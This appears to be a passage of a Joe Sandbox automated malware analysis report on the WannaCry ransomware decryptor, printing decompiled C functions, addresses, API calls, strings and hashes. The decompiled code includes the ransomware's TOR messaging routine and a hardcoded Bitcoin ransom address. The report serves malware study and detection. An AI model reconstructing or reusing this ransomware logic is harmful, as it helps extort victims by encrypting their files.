														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t41 = _t157 + 4; // 0x4
													_t321 = _t41;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t42 = _t157 + 4; // 0x4
													_t321 = _t42;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("/../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t43 = _t157 + 4; // 0x4
													_t321 = _t43;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
													goto L23;
												}
												_push("/..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t44 = _t157 + 4; // 0x4
													_t321 = _t44;
													continue;
												}
												asm("repne scasb");
												_t338 = _t321 -  !0xffffffff;
												_t297 =  *(_t353 + 0x70);
												_t160 = memcpy(_t346 + 4, _t338,  !0xffffffff >> 2 << 2);
												_t354 = _t353 + 0xc;
												 *((char*)(_t354 + 0x13)) = 0;
												_t162 = memcpy(_t338 + 0x175b75a, _t338, _t160 & 0x00000003);
												_t355 = _t354 + 0xc;
												_t164 = _t162 >> 0x0000001e & 0x00000001;
												_t264 =  !(_t297 >> 0x17) & 0x00000001;
												_t340 =  *(_t355 + 0x3c) >> 8;
												__eflags = _t340;
												 *(_t355 + 0x12) = 0;
												_t234 = 1;
												if(_t340 == 0) {
													L39:
													_t264 = _t297 & 0x00000001;
													 *(_t355 + 0x13) = _t297 >> 0x00000001 & 0x00000001;
													 *(_t355 + 0x12) = _t297 >> 0x00000002 & 0x00000001;
													_t164 = _t297 >> 0x00000004 & 0x00000001;
													_t299 = _t297 >> 0x00000005 & 0x00000001;
													__eflags = _t299;
													_t234 = _t299;
												} else {
													__eflags = _t340 - 7;
													if(_t340 == 7) {
														goto L39;
													} else {
														__eflags = _t340 - 0xb;
														if(_t340 == 0xb) {
															goto L39;
														} else {
															__eflags = _t340 - 0xe;
															if(_t340 == 0xe) {
																goto L39;
															}
														}
													}
												}
												_t341 = 0;
												__eflags = _t164;
												 *(_t346 + 0x108) = 0;
												if(_t164 != 0) {
													 *(_t346 + 0x108) = 0x10;
												}
												__eflags = _t234;
												if(_t234 != 0) {
													_t219 =  *(_t346 + 0x108) | 0x00000020;
													__eflags = _t219;
													 *(_t346 + 0x108) = _t219;
												}
												__eflags =  *(_t355 + 0x13);
												if( *(_t355 + 0x13) != 0) {
													_t217 =  *(_t346 + 0x108) | 0x00000002;
													__eflags = _t217;
													 *(_t346 + 0x108) = _t217;
												}
												__eflags = _t264;
												if(_t264 != 0) {
													_t215 =  *(_t346 + 0x108) | 0x00000001;
													__eflags = _t215;
													 *(_t346 + 0x108) = _t215;
												}
												__eflags =  *(_t355 + 0x12);
												if( *(_t355 + 0x12) != 0) {
													_t63 = _t346 + 0x108;
													 *_t63 =  *(_t346 + 0x108) | 0x00000004;
													__eflags =  *_t63;
												}
												_t300 =  *((intOrPtr*)(_t355 + 0x58));
												 *((intOrPtr*)(_t346 + 0x124)) =  *((intOrPtr*)(_t355 + 0x54));
												 *((intOrPtr*)(_t346 + 0x128)) = _t300;
												_t177 = E00411B80( *(_t355 + 0x4c) >> 0x10,  *(_t355 + 0x4c));
												_t356 = _t355 + 8;
												 *(_t356 + 0x30) = _t177;
												 *((intOrPtr*)(_t356 + 0x3c)) = _t300;
												LocalFileTimeToFileTime(_t356 + 0x30, _t356 + 0x28);
												_t180 =  *(_t356 + 0x28);
												_t269 =  *((intOrPtr*)(_t356 + 0x2c));
												 *(_t346 + 0x10c) = _t180;
												 *(_t346 + 0x114) = _t180;
												 *(_t346 + 0x11c) = _t180;
												__eflags =  *((intOrPtr*)(_t356 + 0x14)) - 4;
												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
												if( *((intOrPtr*)(_t356 + 0x14)) <= 4) {
													_t329 =  *(_t356 + 0x1c);
												} else {
													_t329 =  *(_t356 + 0x1c);
													 *((char*)(_t356 + 0x1a)) = 0;
													do {
														 *((char*)(_t356 + 0x19)) =  *((intOrPtr*)(_t329 + _t341 + 1));
														 *(_t356 + 0x18) =  *((intOrPtr*)(_t341 + _t329));
														_t273 = "UT";
														_t186 = _t356 + 0x18;
														while(1) {
															_t235 =  *_t186;
															_t303 = _t235;
															__eflags = _t235 -  *_t273;
															if(_t235 !=  *_t273) {
																break;
															}
															__eflags = _t303;
															if(_t303 == 0) {
																L57:
																_t186 = 0;
															} else {
																_t239 =  *((intOrPtr*)(_t186 + 1));
																_t311 = _t239;
																_t92 = _t273 + 1; // 0x2f000054
																__eflags = _t239 -  *_t92;
																if(_t239 !=  *_t92) {
																	break;
																} else {
																	_t186 = _t186 + 2;
																	_t273 = _t273 + 2;
																	__eflags = _t311;
																	if(_t311 != 0) {
																		continue;
																	} else {
																		goto L57;
																	}
																}
															}
															L59:
															__eflags = _t186;
															if(_t186 == 0) {
																_t188 =  *((intOrPtr*)(_t341 + _t329 + 4));
																_t343 = _t341 + 5;
																_t276 = 1;
																__eflags = _t188 & 0x00000001;
																 *((char*)(_t356 + 0x12)) = 1;
																if((_t188 & 0x00000001) != 0) {
																	_t309 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t212 = E00411B50(_t309, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x11c) = _t212;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x120)) = 0;
																}
																__eflags = 1;
																if(1 != 0) {
																	_t307 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t204 = E00411B50(_t307, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x10c) = _t204;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x110)) = 0;
																}
																__eflags = _t276;
																if(_t276 != 0) {
																	 *(_t346 + 0x114) = E00411B50( *((intOrPtr*)(_t343 + _t329)), 0 << 8 << 8);
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x118)) = 0;
																}
															} else {
																goto L60;
															}
															goto L69;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L59;
														L60:
														_t341 = _t341 + 4;
														__eflags = _t341 + 4 -  *((intOrPtr*)(_t356 + 0x14));
													} while (_t341 + 4 <  *((intOrPtr*)(_t356 + 0x14)));
												}
												L69:
												__eflags = _t329;
												if(_t329 != 0) {
													_push(_t329);
													L00412C98();
													_t356 = _t356 + 4;
												}
												_t182 =  *((intOrPtr*)(_t356 + 0x20));
												memcpy(_t182 + 8, _t346, 0x4b << 2);
												 *((intOrPtr*)(_t182 + 0x134)) =  *((intOrPtr*)(_t356 + 0x2a0));
												__eflags = 0;
												return 0;
												goto L73;
											}
										} else {
											_push(_t313);
											L00412C98();
											return 0x800;
										}
									} else {
										return 0x800;
									}
								} else {
									return 0x700;
								}
							} else {
								goto L8;
							}
						} else {
							if(_t312 == _t232) {
								L8:
								_t226 =  *((intOrPtr*)(_t348 + 0x28c));
								 *_t226 =  *((intOrPtr*)( *_t336 + 4));
								 *((char*)(_t226 + 4)) = 0;
								 *((intOrPtr*)(_t226 + 0x108)) = 0;
								 *((intOrPtr*)(_t226 + 0x10c)) = 0;
								 *((intOrPtr*)(_t226 + 0x110)) = 0;
								 *((intOrPtr*)(_t226 + 0x114)) = 0;
								 *((intOrPtr*)(_t226 + 0x118)) = 0;
								 *((intOrPtr*)(_t226 + 0x11c)) = 0;
								 *((intOrPtr*)(_t226 + 0x120)) = 0;
								 *((intOrPtr*)(_t226 + 0x124)) = 0;
								 *((intOrPtr*)(_t226 + 0x128)) = 0;
								__eflags = 0;
								return 0;
							} else {
								return memcpy( *(_t348 + 0x298), _t336 + 8, 0x4b << 2);
							}
						}
					}
				}
				L73:
			}

0x00411cf9
0x00411d00
0x00411d03
0x00411d07
0x00411d0b
0x00412233
0x0041223f
0x00411d11
0x00411d11
0x00411d16
0x00000000
0x00411d1c
0x00411d1f
0x00411d22
0x00411d27
0x00411d27
0x00411d30
0x00411d35
0x00411d5a
0x00411d5c
0x00411db5
0x00411db7
0x00411dba
0x00411dbd
0x00411dc2
0x00411dc2
0x00411dc5
0x00411dc7
0x00411dca
0x00411dcd
0x00411dd2
0x00411dd4
0x00411dd7
0x00411dd7
0x00411df9
0x00411e10
0x00411e15
0x00411e18
0x00411e1a
0x00411e39
0x00411e3e
0x00411e41
0x00411e43
0x00411e56
0x00411e5a
0x00411e5b
0x00411e62
0x00411e68
0x00411e73
0x00411e7c
0x00411e7f
0x00411e81
0x00411eae
0x00411eb7
0x00411eb9
0x00411ebd
0x00411ec9
0x00411ecd
0x00411ed4
0x00411ed4
0x00411ed7
0x00411ed7
0x00411ed9
0x00411ee0
0x00411ee0
0x00411ee2
0x00411ee4
0x00000000
0x00000000
0x00411ee6
0x00411ee6
0x00411ee9
0x00411eeb
0x00411ee0
0x00411ee0
0x00411ee2
0x00411ee4
0x00000000
0x00000000
0x00000000
0x00411ee4
0x00411ee0
0x00411ef0
0x00411ef0
0x00411ef2
0x00411ef4
0x00411ee0
0x00411ee0
0x00411ee2
0x00411ee4
0x00000000
0x00000000
0x00000000
0x00411ee4
0x00411ee0
0x00411ef7
0x00411ef9
0x00411efb
0x00411ee0
0x00411ee0
0x00411ee2
0x00411ee4
0x00000000
0x00000000
0x00000000
0x00411ee4
0x00411ee0
0x00411efe
0x00411f03
0x00411f04
0x00411f09
0x00411f0c
0x00411f0e
0x00411f10
0x00411f10
0x00411ee0
0x00411ee0
0x00411ee2
0x00411ee4
0x00000000
0x00000000
0x00000000
0x00411ee4
0x00411ee0
0x00411f15
0x00411f1a
0x00411f1b
0x00411f20
0x00411f23
0x00411f25
0x00411f27
0x00411f27
0x00411ee0
0x00411ee0
0x00411ee2
0x00411ee4
0x00000000
0x00000000
0x00000000
0x00411ee4
0x00411ee0
0x00411f2c
0x00411f31
0x00411f32
0x00411f37
0x00411f3a
0x00411f3c
0x00411f3e
0x00411f3e
0x00411ee0
0x00411ee0
0x00411ee2
0x00411ee4
0x00000000
0x00000000
0x00000000
0x00411ee4
0x00000000
0x00411ee0
0x00411f43
0x00411f48
0x00411f49
0x00411f4e
0x00411f51
0x00411f53
0x00411f55
0x00411f55
0x00000000
0x00411f55
0x00411f5f
0x00411f6a
0x00411f6e
0x00411f75
0x00411f75
0x00411f7e
0x00411f83
0x00411f83
0x00411f93
0x00411f95
0x00411f98
0x00411f98
0x00411f9b
0x00411fa0
0x00411fa2
0x00411fb3
0x00411fbb
0x00411fbe
0x00411fc9
0x00411fd5
0x00411fd7
0x00411fd7
0x00411fda
0x00411fa4
0x00411fa4
0x00411fa7
0x00000000
0x00411fa9
0x00411fa9
0x00411fac
0x00000000
0x00411fae
0x00411fae
0x00411fb1
0x00000000
0x00000000
0x00411fb1
0x00411fac
0x00411fa7
0x00411fdc
0x00411fde
0x00411fe0
0x00411fe6
0x00411fe8
0x00411fe8
0x00411ff2
0x00411ff4
0x00411ffc
0x00411ffc
0x00411ffe
0x00411ffe
0x00412008
0x0041200a
0x00412012
0x00412012
0x00412014
0x00412014
0x0041201a
0x0041201c
0x00412024
0x00412024
0x00412026
0x00412026
0x00412035
0x00412037
0x00412039
0x00412039
0x00412039
0x00412039
0x00412043
0x00412047
0x00412058
0x0041205e
0x00412063
0x00412066
0x00412074
0x00412078
0x0041207e
0x00412082
0x00412086
0x0041208c
0x00412092
0x0041209c
0x0041209e
0x004120a4
0x004120aa
0x004120b0
0x004121f2
0x004120b6
0x004120b6
0x004120ba
0x004120bf
0x004120c6
0x004120ca
0x004120ce
0x004120d3
0x004120d7
0x004120d7
0x004120d9
0x004120db
0x004120dd
0x00000000
0x00000000
0x004120df
0x004120e1
0x004120f7
0x004120f7
0x004120e3
0x004120e3
0x004120e6
0x004120e8
0x004120e8
0x004120eb
0x00000000
0x004120ed
0x004120ed
0x004120f0
0x004120f3
0x004120f5
0x00000000
0x00000000
0x00000000
0x00000000
0x004120f5
0x004120eb
0x00412100
0x00412100
0x00412102
0x00412120
0x00412124
0x00412133
0x00412136
0x00412138
0x0041213c
0x00412150
0x00412153
0x0041215e
0x00412161
0x00412166
0x0041216a
0x00412170
0x00412173
0x00412173
0x00412179
0x0041217b
0x0041218f
0x00412192
0x0041219d
0x004121a0
0x004121a5
0x004121a9
0x004121af
0x004121b2
0x004121b2
0x004121b8
0x004121ba
0x004121e1
0x004121e7
0x004121ea
0x004121ea
0x00000000
0x00000000
0x00000000
0x00000000
0x00412102
0x004120fb
0x004120fd
0x00000000
0x00412104
0x0041210e
0x00412115
0x00412115
0x00412119
0x004121f6
0x004121f6
0x004121f8
0x004121fa
0x004121fb
0x00412200
0x00412200
0x00412203
0x00412214
0x0041221f
0x00412225
0x0041222e
0x00000000
0x0041222e
0x00411e83
0x00411e83
0x00411e84
0x00411e9a
0x00411e9a
0x00411e47
0x00411e53
0x00411e53
0x00411e1e
0x00411e2a
0x00411e2a
0x00000000
0x00000000
0x00000000
0x00411d37
0x00411d39
0x00411d5e
0x00411d66
0x00411d6d
0x00411d71
0x00411d74
0x00411d7a
0x00411d80
0x00411d86
0x00411d8c
0x00411d92
0x00411d98
0x00411d9e
0x00411da4
0x00411daa
0x00411db2
0x00411d3b
0x00411d57
0x00411d57
0x00411d39
0x00411d35
0x00411d16
0x00000000

Strings

\../, xrefs: 00411F15
/..\, xrefs: 00411F43
\..\, xrefs: 00411EFE
/../, xrefs: 00411F2C

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID: /../$/..\$\../$\..\
API String ID: 0-3885502717
Opcode ID: 2a7b4835dbee33ff67917d53809c18ea5066a20c5d79c717924bcce35cecf77d
Instruction ID: 7e1d0207c54717434a39a3e8c1400c014a600b9e0d7efc558eb6bad2cf7342ef
Opcode Fuzzy Hash: 2a7b4835dbee33ff67917d53809c18ea5066a20c5d79c717924bcce35cecf77d
Instruction Fuzzy Hash: FAF138756043414FC724CF2888817EBBBE1ABD8304F18892EEDD9CB351D679E989C799

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB80 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,00000000), ref: 0040DB91

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
Instruction ID: 7776e5be7928a6c2c2562dd3bb1774681ff5e82bf649542f35cb965541f1d725
Opcode Fuzzy Hash: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
Instruction Fuzzy Hash: 0BC04CB9204300FFD204CB10CD85F6BB7A9EBD4711F10C90DB98D86254C670EC10DA65

Uniqueness

Uniqueness Score: -1.00%

Function 004082C0 Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 181
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E004082C0(void* __ecx) {
				void* __ebp;
				signed int _t44;
				void* _t45;
				void* _t47;
				signed int _t48;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t59;
				void* _t60;
				signed int _t65;
				signed int _t90;
				signed int _t91;
				signed int _t104;
				intOrPtr* _t106;
				struct _IO_FILE* _t107;
				signed int _t108;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				void* _t116;
				void* _t118;
				void* _t120;

				_push(0xffffffff);
				_push(E00413FCE);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t114;
				_t115 = _t114 - 0x8c;
				_t111 = __ecx;
				 *((intOrPtr*)(_t115 + 0xa4)) = 0;
				_t44 =  *( *((intOrPtr*)(_t115 + 0xac)) - 8);
				if(_t44 > 0x3e8) {
					_push(0x3e8);
					_push(0);
					_push(_t115 + 0x14);
					L00412F6E();
					_push(_t44);
					 *((char*)(_t115 + 0xa8)) = 1;
					L00412D9A();
					 *((char*)(_t115 + 0xa4)) = 0;
					L00412CC2();
				}
				if( *( *((intOrPtr*)(_t115 + 0xac)) - 8) >= 0xa) {
					_t106 = __imp__time;
					_t45 =  *_t106(0);
					_t90 =  *0x4218a8; // 0x0
					_t116 = _t115 + 4;
					__eflags = _t45 - _t90 - 0xb4;
					if(_t45 - _t90 >= 0xb4) {
						L13:
						_t47 =  *_t106(0);
						_t91 =  *0x4218a8; // 0x0
						_t116 = _t116 + 4;
						_t48 = _t47 - _t91;
						__eflags = _t48 - 0xe10;
						if(_t48 <= 0xe10) {
							L9:
							__eflags =  *0x4218ac - 3; // 0x0
							if(__eflags < 0) {
								L15:
								 *((intOrPtr*)(_t116 + 0x14)) = 0;
								memset(_t116 + 0x18, 0, 0x21 << 2);
								_t51 = fopen("00000000.res", "rb"); // executed
								_t107 = _t51;
								_t118 = _t116 + 0x14;
								__eflags = _t107;
								if(_t107 != 0) {
									fread(_t118 + 0x1c, 0x88, 1, _t107); // executed
									fclose(_t107);
									E0040BE90("s.wnry", _t111 + 0x6ea, _t111 + 0x74e);
									_push(0);
									_push( *((intOrPtr*)(_t118 + 0xcc)));
									_push(_t118 + 0x38);
									_push(_t111 + 0x5f0);
									_t56 = E0040C060( *((intOrPtr*)(_t118 + 0xcc)), __eflags);
									_t118 = _t118 + 0x30;
									_t108 = _t56;
									E0040C670();
									_t58 =  *(_t118 + 0xb0);
									__eflags = _t108;
									if(_t108 < 0) {
										__eflags = _t58;
										if(_t58 != 0) {
											_push(0);
											_push(0x30);
											_push("Failed to send your message!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
											L00412CC8();
										}
									} else {
										__eflags = _t58;
										if(_t58 != 0) {
											L00412CC8();
											__imp__time(0, "Your message has been sent successfully!", 0x40, 0);
											_t118 = _t118 + 4;
											 *0x4218a8 = _t58;
										}
									}
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t108;
								} else {
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t51 | 0xffffffff;
								}
								L23:
								 *[fs:0x0] =  *((intOrPtr*)(_t118 + 0x9c));
								return _t59;
							}
							__eflags =  *(_t116 + 0xb0);
							if( *(_t116 + 0xb0) != 0) {
								L00412DA6();
								 *((char*)(_t116 + 0xa8)) = 2;
								_t60 =  *_t106(0);
								_t104 =  *0x4218a8; // 0x0
								_t120 = _t116 + 4;
								__eflags = 0x3d;
								_push(0x3d - ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5) + ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5 >> 0x1f));
								_push("You are sending too many mails! Please try again %d minutes later.");
								_push(_t120 + 0x10);
								L00412E00();
								_t48 =  *(_t120 + 0x1c);
								_t116 = _t120 + 0xc;
								_push(0);
								_push(0);
								_push(_t48);
								L00412CC8();
								 *((char*)(_t116 + 0xa4)) = 0;
								L00412CC2();
							}
							 *((intOrPtr*)(_t116 + 0xa4)) = 0xffffffff;
							L00412CC2();
							_t59 = _t48 | 0xffffffff;
							goto L23;
						}
						 *0x4218ac = 0;
						goto L15;
					}
					_t65 =  *0x4218ac; // 0x0
					__eflags = _t65 - 3;
					if(_t65 >= 3) {
						goto L13;
					}
					_t48 = _t65 + 1;
					__eflags = _t48;
					 *0x4218ac = _t48;
					goto L9;
				}
				if( *((intOrPtr*)(_t115 + 0xb0)) != 0) {
					_push(0);
					_push(0);
					_push("Too short message!");
					L00412CC8();
				}
				 *((intOrPtr*)(_t115 + 0xa4)) = 0xffffffff;
				L00412CC2();
				_t59 = _t44 | 0xffffffff;
				goto L23;
			}

0x004082c0
0x004082c2
0x004082cd
0x004082ce
0x004082d5
0x004082df
0x004082ea
0x004082f1
0x004082f9
0x004082fb
0x00408304
0x00408305
0x0040830d
0x00408312
0x0040831a
0x00408322
0x0040832b
0x00408332
0x00408332
0x00408342
0x00408378
0x0040837f
0x00408381
0x00408387
0x00408391
0x00408396
0x0040844d
0x0040844e
0x00408450
0x00408456
0x00408459
0x0040845b
0x00408460
0x004083af
0x004083af
0x004083b5
0x0040846c
0x00408477
0x00408485
0x00408487
0x0040848d
0x0040848f
0x00408492
0x00408494
0x004084c2
0x004084c9
0x004084e2
0x004084ee
0x004084f3
0x004084fa
0x004084fb
0x004084fc
0x00408501
0x00408504
0x00408506
0x0040850b
0x00408512
0x00408514
0x00408538
0x0040853a
0x0040853c
0x0040853d
0x0040853f
0x00408544
0x00408544
0x00408516
0x00408516
0x00408518
0x00408522
0x00408528
0x0040852e
0x00408531
0x00408531
0x00408518
0x00408550
0x0040855b
0x00408560
0x00408496
0x0040849d
0x004084a8
0x004084ad
0x004084ad
0x00408562
0x0040856d
0x0040857a
0x0040857a
0x004083bb
0x004083c2
0x004083c8
0x004083ce
0x004083d6
0x004083d8
0x004083f5
0x004083fd
0x00408403
0x00408404
0x00408409
0x0040840a
0x0040840f
0x00408413
0x00408416
0x00408417
0x00408418
0x00408419
0x00408422
0x00408429
0x00408429
0x00408435
0x00408440
0x00408445
0x00000000
0x00408445
0x00408466
0x00000000
0x00408466
0x0040839c
0x004083a1
0x004083a3
0x00000000
0x00000000
0x004083a9
0x004083a9
0x004083aa
0x00000000
0x004083aa
0x0040834b
0x0040834d
0x0040834e
0x0040834f
0x00408354
0x00408354
0x00408360
0x0040836b
0x00408370
0x00000000

APIs

#4278.MFC42(000003E8,00000000,000003E8,?,?,760D5C80), ref: 0040830D
#858.MFC42 ref: 00408322
#800.MFC42 ref: 00408332
#1200.MFC42(Too short message!,00000000,00000000,?,?,760D5C80), ref: 00408354
#800.MFC42 ref: 0040836B
time.MSVCRT ref: 0040837F
#540.MFC42 ref: 004083C8
time.MSVCRT ref: 004083D6
#2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
#1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
#800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
#800.MFC42 ref: 00408440
time.MSVCRT ref: 0040844E
fopen.MSVCRT ref: 00408487
#800.MFC42 ref: 004084A8
fread.MSVCRT ref: 004084C2
fclose.MSVCRT ref: 004084C9
#1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
time.MSVCRT ref: 00408528
#1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
#800.MFC42 ref: 0040855B

Strings

You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
Your message has been sent successfully!, xrefs: 0040851D
s.wnry, xrefs: 004084DD
Too short message!, xrefs: 0040834F
00000000.res, xrefs: 00408480
Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #800$#1200time$#2818#4278#540#858fclosefopenfread
String ID: 00000000.res$Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$Too short message!$You are sending too many mails! Please try again %d minutes later.$Your message has been sent successfully!$s.wnry
API String ID: 1233543560-382338106
Opcode ID: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
Instruction ID: 9ef4e74ff6f5855000ff98dc085b89da37e67c7abdef0d08bf307c22ead08a72
Opcode Fuzzy Hash: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
Instruction Fuzzy Hash: D6610371604340EFD330EB28DD81BEFB795AB90324F444A3EF199932D0DB78594586AB

Uniqueness

Uniqueness Score: -1.00%

Function 004064D0 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 256
stringwindowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E004064D0(intOrPtr __ecx, void* __fp0) {
				char _v1032;
				char _v1424;
				void _v2256;
				void _v2456;
				void _v2707;
				char _v2708;
				intOrPtr _v2720;
				short _v2724;
				int _t48;
				int _t49;
				intOrPtr* _t50;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				short _t70;
				void* _t82;
				char* _t87;
				char* _t89;
				intOrPtr _t90;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t105;
				char _t122;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr* _t140;
				intOrPtr* _t141;
				intOrPtr* _t142;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t163;
				void* _t165;
				void* _t167;
				intOrPtr* _t168;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t201;

				_t201 = __fp0;
				_t90 = __ecx; // executed
				L00412CB0(); // executed
				SendMessageA( *(__ecx + 0x20), 0x80, 1,  *(__ecx + 0x82c)); // executed
				SendMessageA( *(_t90 + 0x20), 0x80, 0,  *(_t90 + 0x82c)); // executed
				_t48 = E00401C70(0);
				_t170 = _t169 + 4;
				if(_t48 == 0) {
					_t122 =  *0x421798; // 0x0
					_v2708 = _t122;
					memset( &_v2707, _t48, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetModuleFileNameA(0,  &_v2708, 0x104);
					_t87 = strrchr( &_v2708, 0x5c);
					_t170 = _t170 + 0x14;
					if(_t87 != 0) {
						_t89 = strrchr( &_v2708, 0x5c);
						_t170 = _t170 + 8;
						 *_t89 = 0;
					}
					SetCurrentDirectoryA( &_v2708);
				}
				_t167 = _t90 + 0x50c;
				_t49 = E00401A10(_t167, 1);
				_t171 = _t170 + 8;
				if(_t49 == 0) {
					memset(_t167, _t49, 0xc3 << 2);
					asm("repne scasb");
					_t165 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94";
					_t82 = memcpy(_t165 + 0x175b75a, _t165, memcpy(_t90 + 0x5be, _t165, 0 << 2) & 0x00000003);
					 *((intOrPtr*)(_t90 + 0x584)) = 0x43960000;
					 *(_t90 + 0x588) = 0;
					__imp__time(0);
					 *(_t90 + 0x578) = _t82;
					E00401A10(_t167, 0);
					_t171 = _t171 + 0x30;
				}
				_t50 = E00402C40();
				__imp__#115(0x202,  &_v1424); // executed
				__imp____p___argc();
				if( *_t50 > 1) {
					_t168 = __imp____p___argv;
					_t140 = "fi";
					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
					while(1) {
						_t98 =  *_t161;
						_t60 = _t98;
						if(_t98 !=  *_t140) {
							break;
						}
						if(_t60 == 0) {
							L12:
							_t60 = 0;
						} else {
							_t136 =  *((intOrPtr*)(_t161 + 1));
							_t22 = _t140 + 1; // 0x31000069
							_t60 = _t136;
